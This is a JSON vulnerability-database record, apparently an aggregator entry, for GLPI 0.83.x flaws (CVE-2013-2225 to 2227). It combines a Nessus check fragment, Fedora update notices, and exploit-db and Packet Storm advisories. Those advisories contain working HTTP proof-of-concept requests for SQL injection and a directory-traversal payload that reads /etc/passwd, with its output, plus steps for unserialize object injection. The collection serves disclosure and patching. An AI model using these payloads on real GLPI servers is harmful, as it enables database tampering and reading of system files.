audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glpi-0.83.91-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2225", "CVE-2013-2226", "CVE-2013-2227"], "description": "GLPI is the Information Resource-Manager with an additional Administration- Interface. You can use it to build up a database with an inventory for your company (computer, software, printers...). It has enhanced functions to make the daily life for the administrators easier, like a job-tracking-system wi th mail-notification and methods to build a database with basic information about your network-topology. ", "modified": "2013-07-04T00:56:51", "published": "2013-07-04T00:56:51", "id": "FEDORA:9243121041", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: glpi-0.83.9.1-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2225", "CVE-2013-2226", "CVE-2013-2227"], "description": "GLPI is the Information Resource-Manager with an additional Administration- Interface. You can use it to build up a database with an inventory for your company (computer, software, printers...). It has enhanced functions to make the daily life for the administrators easier, like a job-tracking-system wi th mail-notification and methods to build a database with basic information about your network-topology. ", "modified": "2013-07-05T02:09:51", "published": "2013-07-05T02:09:51", "id": "FEDORA:CBD3C22326", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: glpi-0.83.9.1-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T03:26:22", "description": "GLPI 0.83.8 - Multiple Vulnerabilities. CVE-2013-2226,CVE-2013-2227. Webapps exploit for php platform", "published": "2013-06-21T00:00:00", "type": "exploitdb", "title": "GLPI 0.83.8 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2227", "CVE-2013-2226"], "modified": "2013-06-21T00:00:00", "id": "EDB-ID:26366", "href": "https://www.exploit-db.com/exploits/26366/", "sourceData": "\r\nGLPI v0.83.8 Multiple Error-based SQL Injection Vulnerabilities\r\n\r\n\r\nVendor: INDEPNET Development Team\r\nProduct web page: http://www.glpi-project.org\r\nAffected version: 0.83.7 and 0.83.8\r\n\r\nSummary: GLPI, an initialism for Gestionnaire libre de parc informatique\r\n(Free Management of Computer Equipment), was designed by Indepnet\r\nAssociation (a non profit organisation) in 2003. GLPI is a free\r\nasset and IT management software package, it also offers functionalities\r\nlike servicedesk ITIL or license tracking and software auditing.\r\n\r\nDesc: Input passed via the POST parameter 'users_id_assign' in\r\n'/ajax/ticketassigninformation.php' script, POST parameter 'filename'\r\nin '/front/document.form.php' script, and POST parameter 'table' in\r\n'glpi/ajax/comments.php' script is not properly sanitised before\r\nbeing used in SQL queries. This can be exploited by a malicious\r\nattacker to manipulate SQL queries by injecting arbitrary SQL code\r\nin the affected application.\r\n\r\n\r\n======================================================================\r\n/inc/db.function.php:\r\n---------------------\r\n\r\n274: function countElementsInTable($table, $condition=\"\") {\r\n275: global $DB;\r\n276:\r\n277: if (is_array($table)) {\r\n278: $table = implode('`,`',$table);\r\n279: }\r\n280:\r\n281: $query = \"SELECT COUNT(*) AS cpt\r\n282: FROM `$table`\";\r\n283:\r\n284: if (!empty($condition)) {\r\n285: $query .= \" WHERE $condition \";\r\n286: }\r\n287:\r\n288: $result =$DB->query($query);\r\n289: $ligne = $DB->fetch_array($result);\r\n290: return $ligne['cpt'];\r\n291: }\r\n\r\n----------------------------------------------------------------------\r\n\r\n*** MySQL query error :\r\n***\r\nSQL: SELECT COUNT(*) AS cpt\r\nFROM `glpi_tickets`,`glpi_tickets_users` WHERE `glpi_tickets_users`.`tickets_id` = `glpi_tickets`.`id`\r\nAND `glpi_tickets_users`.`users_id` = \\'2\\'\\'\r\nAND `glpi_tickets_users`.`type` = \\'2\\'\r\nAND `glpi_tickets`.`is_deleted` = 0\r\nAND `glpi_tickets`.`status`\r\nNOT IN (\\'solved\\', \\'closed\\')\r\nError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2'\r\nAND `glpi_tickets`.`is_deleted` = 0\r\n' at line 3\r\nBacktrace :\r\n/var/www/html/glpi/inc/db.function.php\u00a0:288\t\tDBmysql->query()\r\n/var/www/html/glpi/inc/commonitilobject.class.php\u00a0:362\t\tcountElementsInTable()\r\n/var/www/html/glpi/ajax/ticketassigninformation.php\u00a0:66\t\tCommonITILObject->countActiveObjectsForTech()\r\n/var/www/html/glpi/ajax/ticketassigninformation.php\r\n\r\n\r\n======================================================================\r\n/inc/document.class.php:\r\n------------------------\r\n\r\n1221: static function isValidDoc($filename) {\r\n1222: global $DB;\r\n1223:\r\n1224: $splitter = explode(\".\",$filename);\r\n1225: $ext = end($splitter);\r\n1226:\r\n1227: $query=\"SELECT *\r\n1228: FROM `glpi_documenttypes`\r\n1229: WHERE `ext` LIKE '$ext'\r\n1230: AND `is_uploadable`='1'\";\r\n1231:\r\n1232: if ($result = $DB->query($query)) {\r\n1233: if ($DB->numrows($result)>0) {\r\n1234: return Toolbox::strtoupper($ext);\r\n1235: }\r\n1236: }\r\n1237: return \"\";\r\n1238: }\r\n\r\n----------------------------------------------------------------------\r\n\r\n*** MySQL query error :\r\n***\r\nSQL: SELECT *\r\nFROM `glpi_documenttypes`\r\nWHERE `ext` LIKE \\'1\\'\\'\r\nAND `is_uploadable`=\\'1\\'\r\nError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3\r\nBacktrace :\r\n/var/www/html/glpi/inc/document.class.php\u00a0:1232\t\tDBmysql->query()\r\n/var/www/html/glpi/inc/document.class.php\u00a0:1088\t\tDocument::isValidDoc()\r\n/var/www/html/glpi/inc/document.class.php\u00a0:275\t\tDocument::uploadDocument()\r\n/var/www/html/glpi/inc/commondbtm.class.php\u00a0:878\t\tDocument->prepareInputForUpdate()\r\n/var/www/html/glpi/front/document.form.php\u00a0:99\t\tCommonDBTM->update()\r\n/var/www/html/glpi/front/document.form.php\r\n\r\n\r\n======================================================================\r\n/inc/dbmysql.class.php:\r\n-----------------------\r\n\r\n364: function list_tables($table=\"glpi_%\") {\r\n365: return $this->query(\"SHOW TABLES LIKE '\".$table.\"'\");\r\n366: }\r\n\r\n----------------------------------------------------------------------\r\n\r\n*** MySQL query error :\r\n***\r\nSQL: SHOW TABLES LIKE \\'%glpi_users\\'%\\'\r\nError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1\r\nBacktrace :\r\n/var/www/html/glpi/glpi/inc\\dbmysql.class.php\u00a0:365\t\tDBmysql->query()\r\n/var/www/html/glpi/inc/db.function.php\u00a0:1182\t\tDBmysql->list_tables()\r\n/var/www/html/glpi/ajax/comments.php\u00a0:47\t\tTableExists()\r\n/var/www/html/glpi/ajax/comments.php\r\n\r\n======================================================================\r\n\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN) - Apache/2.4.3, PHP/5.4.7\r\n Linux CentOS 6.0 (Final) - Apache/2.2.15, PHP/5.3.3\r\n\r\n\r\n\r\nVulnerabilities discovered by Humberto Cabrera\r\n @dniz0r\r\n Zero Science Lab - http://www.zeroscience.mk\r\n\r\n\r\nAdvisory ID: ZSL-2013-5145\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5145.php\r\n\r\n\r\n09.05.2013\r\n\r\n----------------\r\n{1}\r\n\r\n\r\nPOST /glpi/ajax/ticketassigninformation.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nReferer: http://localhost/glpi/front/ticket.form.php\r\nContent-Length: 17\r\nCookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\nusers_id_assign=2{SQL_Injection}\r\n\r\n\r\n----------------\r\n{2}\r\n\r\n\r\nPOST /glpi/front/document.form.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/glpi/front/document.form.php?id=4\r\nCookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=---------------------------19302542618340\r\nContent-Length: 1699\r\n\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"entities_id\"\r\n\r\n0\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"is_recursive\"\r\n\r\n0\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\ntest\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"comment\"\r\n\r\ntest\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"current_filepath\"\r\n\r\n\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"current_filename\"\r\n\r\n\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"filename\"; filename=1{SQL_Injection}\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"upload_file\"\r\n\r\n\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"link\"\r\n\r\ntest\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"documentcategories_id\"\r\n\r\n0\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"mime\"\r\n\r\napplication/octet-stream\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"update\"\r\n\r\nUpdate\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"_read_date_mod\"\r\n\r\n2013-06-14 20:27:56\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n4\r\n-----------------------------19302542618340\r\nContent-Disposition: form-data; name=\"_glpi_csrf_token\"\r\n\r\nf27853afa3e705b5042c0ae4d135679c\r\n-----------------------------19302542618340--\r\n\r\n\r\n----------------\r\n{3}\r\n\r\n\r\nPOST /glpi/ajax/comments.php HTTP/1.1\r\nHost: localhost\r\nProxy-Connection: keep-alive\r\nContent-Length: 59\r\nOrigin: http://localhost\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nAccept: */*\r\nReferer: http://localhost/glpi/front/planning.php\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: PHPSESSID=frk5prfmarsc9ebo1u751skkb2\r\n\r\nvalue=5&table=glpi_users{SQL Injection}&withlink=comment_link_uID302668907\r\n\r\n\r\n----------------\r\n\r\n#################################################################################################################\r\n\r\n\ufeff\r\nGLPI v0.83.7 (itemtype) Parameter Traversal Arbitrary File Access Exploit\r\n\r\n\r\nVendor: INDEPNET Development Team\r\nProduct web page: http://www.glpi-project.org\r\nAffected version: 0.83.7\r\n\r\nSummary: GLPI, an initialism for Gestionnaire libre de parc informatique\r\n(Free Management of Computer Equipment), was designed by Indepnet\r\nAssociation (a non profit organisation) in 2003. GLPI is a free\r\nasset and IT management software package, it also offers functionalities\r\nlike servicedesk ITIL or license tracking and software auditing.\r\n\r\nDesc: GLPI suffers from a file inclusion vulnerability (LFI) when input\r\npassed thru the 'filetype' parameter to 'common.tabs.php' script is not\r\nproperly verified before being used to include files. This can be exploited\r\nto include files from local resources with directory traversal attacks\r\nand URL encoded NULL bytes.\r\n\r\n========================================================================\r\n/ajax/common.tabs.php:\r\n----------------------\r\n\r\n46: if (!isset($_REQUEST['itemtype']) || empty($_REQUEST['itemtype'])) {\r\n47: exit();\r\n62: $item = new $_REQUEST['itemtype'])();\r\n\r\n========================================================================\r\n\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN) - Apache/2.4.3, PHP/5.4.7\r\n Linux CentOS 6.0 (Final) - Apache/2.2.15, PHP/5.3.3\r\n\r\n\r\n\r\nVulnerabilities discovered by Humberto Cabrera\r\n @dniz0r\r\n Zero Science Lab - http://www.zeroscience.mk\r\n\r\n\r\nAdvisory ID: ZSL-2013-5145\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5145.php\r\n\r\n\r\n09.05.2013\r\n\r\n---\r\n\r\n\r\nPOST /glpi/ajax/common.tabs.php?_dc=1371234969991 HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nReferer: http://localhost/glpi/front/user.form.php?id=2\r\nContent-Length: 75\r\nCookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\ntarget=/glpi/front/user.form.php&itemtype=../../../../../../../../../../../../../../../../etc/passwd%00User&glpi_tab=Profile_User$1&id=2\r\n\r\n---\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/sbin/nologin\r\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\r\nadm:x:3:4:adm:/var/adm:/sbin/nologin\r\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\r\nsync:x:5:0:sync:/sbin:/bin/sync\r\n..\r\n..\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26366/"}, {"lastseen": "2016-02-03T03:47:54", "description": "GLPI 0.83.9 - 'unserialize()' Function Remote Code Execution Vulnerability. CVE-2013-2225. Webapps exploit for php platform", "published": "2013-07-01T00:00:00", "type": "exploitdb", "title": "GLPI 0.83.9 - 'unserialize' Function Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2225"], "modified": "2013-07-01T00:00:00", "id": "EDB-ID:26530", "href": "https://www.exploit-db.com/exploits/26530/", "sourceData": "Source: http://www.securityfocus.com/bid/60823/info\r\n\r\nGLPI is prone to a remote PHP code-execution vulnerability. \r\n\r\nAn attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. \r\n\r\nGLPI 0.83.9 is vulnerable; other versions may also be affected.\r\n\r\nAn attacker can exploit this issue using a web browser. \r\n\r\nThe following example URI is available: \r\n\r\nhttp://www.example.com/glpi/front/ticket.form.php?id=1&_predefined_fields=[XXXX]", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26530/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:24", "description": "", "published": "2013-07-01T00:00:00", "type": "packetstorm", "title": "GLPI 0.83.9 Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2225"], "modified": "2013-07-01T00:00:00", "id": "PACKETSTORM:122242", "href": "https://packetstormsecurity.com/files/122242/GLPI-0.83.9-Code-Execution.html", "sourceData": "`======================================= \nAdvisory title: unserialize vulnerability in GLPI 0.83.9 \nProduct: GLPI 0.83.9 \nDiscovered by: Xavier Mehrenberger <at> Cassidian CyberSecurity \nVulnerable version: 0.83.9 \nTested: v0.83.9, 2013-06-21 \nFixed in repository: 2013-06-23 commits 21169 to 21180 \nCategory: Potential PHP code execution \nVulnerability type: [CWE-502] Deserialization of Untrusted Data \nCVE IDs: none yet \nBy: Xavier Mehrenberger \nCassidian CyberSecurity \nhttp://www.cassidiancybersecurity.com \n======================================= \n \n----- CVE-2013-XXXX Required configuration: No specific configuration required \n \nSteps to reproduce: \n* Issue a request to \nglpi/front/ticket.form.php?id=1&_predefined_fields=XXXX, \n* replacing XXX with a serialized PHP object \n \nVulnerable code sample: \n--- file ticket.class.php, function showFormHelpdesk \nif (isset($options['_predefined_fields'])) { \n$options['_predefined_fields'] \n= \nunserialize(rawurldecode(stripslashes($options['_predefined_fields']))); \n--- \n \nWhen passing a non-existent empty serialized class (ex: class called \"exploit\" value \"O%3A7%3A%22exploit%22%3A0%3A%7B%7D\"), an error occurs, which is caught by the userErrorHandlerNormal function in toolbox.class.php. \n \nWhen a PHP object gets unserialized, its __wakeup() function is executed. When this object gets destroyed, its __destruct() function is executed (since PHP5). No such object exists throughout the GLPI codebase. However, it might exist in a third-party library, as demonstrated by Stefan Esser [2]. \n \n \nMore information about this vulnerability class can be found at [1]. \n \nThe unsafe use of unserialize() has been fixed throughout the codebase in commits 21169 [3] to 21180. \n \nReferences: \n[1] https://www.owasp.org/index.php/PHP_Object_Injection \n[2] http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf \n \n`\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122242/glpi-exec.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "cvelist": ["CVE-2013-5640", "CVE-2013-5916", "CVE-2013-4339", "CVE-2013-5639", "CVE-2013-5692", "CVE-2013-1443", "CVE-2013-4340", "CVE-2013-5696", "CVE-2013-2225", "CVE-2013-5917", "CVE-2013-4315", "CVE-2013-5739", "CVE-2013-2226", "CVE-2013-5738", "CVE-2013-4338", "CVE-2013-5693"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "SECURITYVULNS:VULN:13311", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13311", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
